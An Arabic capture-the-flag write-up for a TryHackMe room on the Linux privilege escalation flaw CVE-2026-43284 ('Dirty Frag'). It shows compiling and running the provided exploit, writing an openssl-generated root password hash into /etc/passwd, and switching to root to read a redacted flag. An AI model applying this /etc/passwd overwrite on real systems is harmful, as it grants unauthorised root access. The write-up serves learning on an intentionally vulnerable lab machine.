
TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup
الغرفة: CVE-2026-43284: Dirty Frag الفئة: تصعيد الامتيازات في لينكس المؤلف: (صفحتي)
غرفة "Dirty Frag" هي غرفة تصعيد صلاحيات محلية (LPE) في لينكس مترابطة، مبنية حول CVE-2026-43284. الهدف هو الانتقال من شل غير مميز إلى صلاحيات الجذر (root) عبر استغلال برهان إثبات الفكرة المقدم.
يُظهر سرد محتويات مجلد العمل الملفات الموفّرة للاستغلال:
$ ls
README.txt
exp
exp.c
exp.c — الكود المصدري للاستغلالexp — ملف تنفيذي مُترجم مسبقًا (قد لا يتوافق مع بيئة الهدف)README.txt — ملاحظات الاستخدام المرفقة مع الاستغلالبما أن الملف التنفيذي exp المقدم قد لا يكون متوافقًا مع بيئة الهدف بدقة، فمن الأأمن إعادة بنائه من المصدر:
$ gcc -O0 -Wall -o exp exp.c -lutil
-O0 يعطّل تحسينات المترجم، مما يحافظ على سلوك يمكن توقعه ويطابق المصدر-Wall يُفعّل تحذيرات المترجم، وهي مفيدة للتحقق من سلامة البناء-lutil يربط مكتبة libutil — وهي مطلوبة غالبًا عندما يستخدم الكود دوال الطرفية الزائفة (pty)$ ./exp
تشغيل الاستغلال المترجم يُفعّل الخلل الكامن، مما يؤدي إلى الحصول على صلاحية الكتابة إلى ملف ينبغي أن يكون للقراءة فقط بالنسبة للمستخدمين غير المميزين — في هذه الحالة، /etc/passwd.
بعد الحصول على صلاحية الكتابة، يتم توليد تجزئة كلمة مرور جديدة للمستخدم root:
$ openssl passwd -1 root
$1$igIXG8so$6K9OaEbAaj.qaknYx9ST..
تُكتب هذه التجزئة في /etc/passwd بدلاً من حقل تجزئة الجذر الحالي:
$ nano /etc/passwd
وبما أن كلمة مرور الجذر أصبحت معروفة الآن، فإن تبديل المستخدمين يكون مباشرًا:
$ su root
$ cat /root/flag.txt
THM{REDACTED}
root:x: وتغيير X إلى التجزئة التي أنشأتها)يُوثّق هذا الشرح غرفة TryHackMe مكتملة لأغراض تعليمية. بيئة الهدف هي جهاز ضعيف عن قصد مقدم من TryHackMe.